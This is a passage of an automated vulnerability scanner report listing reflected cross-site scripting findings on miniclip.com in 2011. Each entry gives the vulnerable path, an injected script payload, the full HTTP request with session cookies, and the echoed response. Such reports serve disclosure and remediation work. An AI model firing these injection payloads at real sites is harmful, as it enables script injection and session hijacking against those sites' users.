scorecardresearch=1848069558-205830962-1311162223126
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:48:14 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:48:14 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:53:14 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:14 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:14 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82523 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/php/servicesc0fcf"><script>alert(1)</script>dea8c6ce7db /indigo/p.php" />...[SNIP]...
1.10. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/php/services/indigo/p.php
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed79"><script>alert(1)</script>ba6abf62cb2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /php/services/indigo5ed79"><script>alert(1)</script>ba6abf62cb2 /p.php?c=page_visited&url=http://www.miniclip.com/games/en/&t=1311162223155&ad_channel=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:48:21 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:48:21 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:53:21 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:21 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:21 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82609 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/php/services/indigo5ed79"><script>alert(1)</script>ba6abf62cb2 /p.php" />...[SNIP]...
1.11. http://www.miniclip.com/php/services/indigo/p.php [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/php/services/indigo/p.php
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1a24"><script>alert(1)</script>0bd87b1074b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /php/services/indigo/p.phpf1a24"><script>alert(1)</script>0bd87b1074b ?c=page_visited&url=http://www.miniclip.com/games/en/&t=1311162223155&ad_channel=1 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:48:28 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:48:28 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:53:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:53:28 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82609 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/php/services/indigo/p.phpf1a24"><script>alert(1)</script>0bd87b1074b " />...[SNIP]...
1.12. http://www.miniclip.com/players/en/resize.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/players/en/resize.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b764"><script>alert(1)</script>f1bed747fb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /players4b764"><script>alert(1)</script>f1bed747fb2 /en/resize.php?uid=18081325&w=16&h=16 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/american-football/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2913; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2653; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.4.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817; ad_is_enabled-position2:gamepage=true; ad_is_enabled-showcase:gamepage=false; ad_is_enabled-supershowcase:gamepage=false; sw=1
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:54:13 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:54:13 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:59:13 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:59:13 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:59:13 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82607 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/players4b764"><script>alert(1)</script>f1bed747fb2 /en/resize.php" />...[SNIP]...
1.13. http://www.miniclip.com/players/en/resize.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/players/en/resize.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96a53"><script>alert(1)</script>a4461a8e661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /players/en96a53"><script>alert(1)</script>a4461a8e661 /resize.php?uid=18081325&w=16&h=16 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/american-football/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2913; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2653; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.4.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817; ad_is_enabled-position2:gamepage=true; ad_is_enabled-showcase:gamepage=false; ad_is_enabled-supershowcase:gamepage=false; sw=1
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:54:19 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:54:19 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:59:19 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:59:19 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:59:20 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82606 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/players/en96a53"><script>alert(1)</script>a4461a8e661 /resize.php" />...[SNIP]...
1.14. http://www.miniclip.com/players/en/resize.php [REST URL parameter 3]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/players/en/resize.php
Issue detail
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 798e8"><script>alert(1)</script>2d41e91fc34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /players/en/resize.php798e8"><script>alert(1)</script>2d41e91fc34 ?uid=18081325&w=16&h=16 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/american-football/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2913; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.3.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2653; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.4.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817; ad_is_enabled-position2:gamepage=true; ad_is_enabled-showcase:gamepage=false; ad_is_enabled-supershowcase:gamepage=false; sw=1
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:54:28 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:54:28 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:59:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:59:28 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:59:28 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82607 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/players/en/resize.php798e8"><script>alert(1)</script>2d41e91fc34 " />...[SNIP]...
1.15. http://www.miniclip.com/scripts/adserver/serve.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/scripts/adserver/serve.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f383"><script>alert(1)</script>e88c2bfc720 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /8f383"><script>alert(1)</script>e88c2bfc720 /adserver/serve.php?t=4&p=US,1,, HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:45:48 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:45:48 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:50:48 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:50:48 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:50:48 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82517 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- s --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/8f383"><script>alert(1)</script>e88c2bfc720 /adserver/serve.php" />...[SNIP]...
1.16. http://www.miniclip.com/scripts/js.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/scripts/js.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d6f6"><script>alert(1)</script>84c27b6e718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /4d6f6"><script>alert(1)</script>84c27b6e718 /js.php?f=global,AC_RunActiveContent,AC_ActiveX,tooltips,quicksearch,credits,facebook,mcto,swfobject,oas/oas_home_games&dc=201134 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:44:02 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:44:02 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:49:02 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:49:02 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:49:02 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82505 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/4d6f6"><script>alert(1)</script>84c27b6e718 /js.php" />...[SNIP]...
1.17. http://www.miniclip.com/scripts/js.php [f parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/scripts/js.php
Issue detail
The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 36269<script>alert(1)</script>401175b7445 was submitted in the f parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /scripts/js.php?f=36269<script>alert(1)</script>401175b7445 &dc=201134 HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false
Response
HTTP/1.1 200 OK Date: Wed, 20 Jul 2011 11:43:33 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Expires: Thu, 21 Jul 2011 11:43:33 GMT Cache-Control: max-age=86400, must-revalidate Last-Modified: Thu, 21 Jul 2011 11:43:33 GMT Etag: fec7013efdadbad7a9a55590e71b97d5 Vary: Accept-Encoding Content-Length: 128 Content-Type: text/javascript /* [INCLUDE FILE] 36269<script>alert(1)</script>401175b7445 */ /* [FILE NOT FOUND] 36269<script>alert(1)</script>401175b7445 */
1.18. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/ajax.php
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f130d"><script>alert(1)</script>7a9a81dd995 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-starf130d"><script>alert(1)</script>7a9a81dd995 /ss-lib/ajax.php?action=getHomepageModule HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1550842470-1311162245817
Response
HTTP/1.1 404 Not Found Date: Wed, 20 Jul 2011 11:49:25 GMT Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Set-Cookie: language=en; expires=Mon, 25-Jul-2011 11:49:25 GMT; path=/; domain=.miniclip.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ad_is_enabled-position2:homepage=true; expires=Wed, 20-Jul-2011 11:54:25 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-showcase:homepage=false; expires=Wed, 20-Jul-2011 11:54:25 GMT; path=/; domain=.miniclip.com Set-Cookie: ad_is_enabled-supershowcase:homepage=false; expires=Wed, 20-Jul-2011 11:54:25 GMT; path=/; domain=.miniclip.com Content-Type: text/html; charset=UTF-8 Content-Length: 82615 <!doctype html> <html lang="en" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <!-- m --> <meta charset="utf-8"> <title>Error 404 - Games at Miniclip.com - ...[SNIP]... <link rel="canonical" href="http://www.miniclip.com/sketch-starf130d"><script>alert(1)</script>7a9a81dd995 /ss-lib/ajax.php" />...[SNIP]...
1.19. http://www.miniclip.com/sketch-star/ss-lib/ajax.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.miniclip.com
Path:
/sketch-star/ss-lib/ajax.php
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde83"><script>alert(1)</script>912545899b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sketch-star/ss-libcde83"><script>alert(1)</script>912545899b3 /ajax.php?action=getHomepageModule HTTP/1.1 Host: www.miniclip.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html, */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://www.miniclip.com/games/en/ Cookie: ipLocation=US; language=en; PHPSESSID=2761004272941268992-1915725707-3144267629514981376; ad_is_enabled-position2:homepage=true; ad_is_enabled-showcase:homepage=false; ad_is_enabled-supershowcase:homepage=false; adserver_last_id_4=2299; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.1.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; OAX=rcHW804mv1oADuWf; scorecardresearch=1848069558-205830962-1311162223126; adserver_last_id_3=2229; __utma=1.467551314.1311162209.1311162209.1311162209.1; __utmb=1.2.10.1311162209; __utmc=1; __utmz=1.1311162209.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; 